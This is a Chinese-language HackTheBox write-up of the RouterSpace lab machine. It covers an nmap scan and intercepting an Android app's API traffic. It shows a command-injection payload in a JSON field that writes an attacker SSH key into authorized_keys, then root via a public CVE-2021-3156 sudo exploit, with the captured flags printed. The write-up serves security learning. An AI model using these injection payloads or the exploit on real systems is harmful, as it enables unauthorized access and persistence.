Hackthebox - RouterSpace

靶场信息

靶场类型

信息搜集

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.148
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 21:16 EST
Nmap scan report for 10.10.11.148
Host is up (0.28s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-76343
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 78
|     ETag: W/"4e-iLIX7S/AlC0nyhqE0lYp8aZLlm4"
|     Date: Mon, 28 Feb 2022 02:17:00 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: j7Q X53 Qp3 9o 7 B2JL }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-10824
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Mon, 28 Feb 2022 02:16:56 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-97983
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Mon, 28 Feb 2022 02:16:57 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.91%I=7%D=2/27%Time=621C309D%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.91%I=7%D=2/27%Time=621C309D%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,13E4,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-10824\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Mon,\x2028\x20Feb\x202022\x2002:16:56\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-97983\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Mon,\x2028\x20Feb\x202022\x2002:16
SF::57\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,134,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-76343\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2078\r\nETag:\x20W
SF:/\"4e-iLIX7S/AlC0nyhqE0lYp8aZLlm4\"\r\nDate:\x20Mon,\x2028\x20Feb\x2020
SF:22\x2002:17:00\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x20j7Q\x20\x20X53\x20Qp3\x20\x20
SF:9o\x207\x20\x20\x20B2JL\x20\x20}\n\n\n\n\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running: Cisco embedded, Linux 2.6.X
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
OS details: Cisco Unified Communications Manager VoIP adapter, Linux 2.6.26 (PCLinuxOS)

TRACEROUTE (using port 80/tcp)
HOP RTT    ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.18 seconds

Http

先去看看80端口

这似乎是一个公寓的路由管理系统

先到处看看

这里右上角Download会下载一个apk包，下载下来后使用模拟器运行然后burp抓包看看

Apk

https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd

在Debian架构的Linux中安装AnBox模拟器的方法

anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity

安装后以后咱们启动模拟器

adb shell settings put global http_proxy 192.168.31.208:8080

然后burp设置好监听端口以后，使用burp对anbox进行代理

adb install RouterSpace.apk

安装app，然后打开

APK文件运行后就只有一个查看状态的按钮，我们抓包看看

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{"ip":"0.0.0.0"}

将routerspace.htb加入到hosts

echo 10.10.11.148 routerspace.htb >> /etc/hosts

抓包下来后是这么个状态，去放包看看

这边我有个大胆的想法，看着跟DVWA的命令注入很类似，去测试一下是否可行

成功被执行了，那就好玩了，去构造POC拿shell吧

漏洞利用

尝试写入文件，但是无法执行成功

试试能不能执行命令

调用bash也失败了

然后在/home/paul/.ssh/里也没有东西，但是经过测试后，.ssh里可以写入文件

这里突然就有个思路了，生成一个sshkey，然后写入进去就可以ssh登陆了

ssh-keygen
然后全部默认即可生成

然后把id_rsa.pub的内容保存为authorized_keys

{"ip":"0.0.0.0|echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMxVRUf56TSx5tkTab+gCMuO3EFgbMTbNlLOhqEvLiDLcST6zbYl0ofc4cGNguoi6ti6iyi8ZHyS8DjJ89thmpTrDiYXf39Z8QhkO2DaQkzh6FjvvGgY82pVBPtRq1qL0JrnOgqhGBigs3kPbd0kkdmOmDbmV1w1p9omfk2Tj/+q469S+1IVCtQIIvtNuuGTUeTMYQdCfFLOB4OVHBLvAuucIagK2DJrJLgcf0w/DQ/9X04luqhqQET8SfQqBpfn1nq/CcJvXsMlCGqbjE4m6c5l4WIaeAtfrhUdrVukSg0x/r1OJvEm4MgevR7eN/umwGP6yQVH34eBoTHoU6P+H3+9csDAMujbSCWJi3yGK9U5Q7Rei0DsiCrd6T0qbQuCmu4bUdJZfSZCGPCSxO7LRCQlNI13RLRTTUPh6cQn7eB+bnucs/YRgx2/O4b+EDsWGEveXQTpfbJxYLMeespC95v5Rj/vl1C3zqq2nIUIqXC13Y+966+92x4Y6vVmaKDC0= root@kali' > /home/paul/.ssh/authorized_keys"}

然后给700权限

{"ip":"0.0.0.0|chmod 700 /home/paul/.ssh/authorized_keys"}

然后使用ssh进行登陆

┌──(root💀kali)-[~/Desktop]
└─# ssh paul@10.10.11.148 -i id_rsa                         
The authenticity of host '10.10.11.148 (10.10.11.148)' can't be established.
ECDSA key fingerprint is SHA256:M4jDfH65U/Fw7jjmKhTZcb9LgW/gi23OjcLjM1bA5UY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.148' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 03 Mar 2022 11:30:25 AM UTC

  System load:           0.07
  Usage of /:            71.7% of 3.49GB
  Memory usage:          31%
  Swap usage:            0%
  Processes:             214
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.148
  IPv6 address for eth0: dead:beef::250:56ff:feb9:888d

80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Mar  2 22:54:39 2022 from 10.10.14.27
paul@routerspace:~$ whoami&&id
paul
uid=1001(paul) gid=1001(paul) groups=1001(paul)

成功拿到user权限

paul@routerspace:~$ ls
snap  user.txt
paul@routerspace:~$ cat user.txt 
a874812f3d7207b3f4ad32da4bc2bc84

成功拿到user权限的flag文件

权限提升

首先去跑一个linpeas.sh脚本看看有没有提权点

https://github.com/LucifielHack/linpeas.sh/blob/main/linpeas.sh

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version                                                                  
Sudo version 1.8.31

跑完以后我看到了这么个东西，然后去搜索一下sudo 1.8.31的漏洞

这里看到了一个漏洞CVE-2021-3156

https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

paul@routerspace:~/Sudo-1.8.31-Root-Exploit$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
paul@routerspace:~/Sudo-1.8.31-Root-Exploit$ ./exploit 
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),1001(paul)

成功拿到root权限的flag文件

# cat /root/root.txt
f3388fc86d949870742895a2c1d6f16e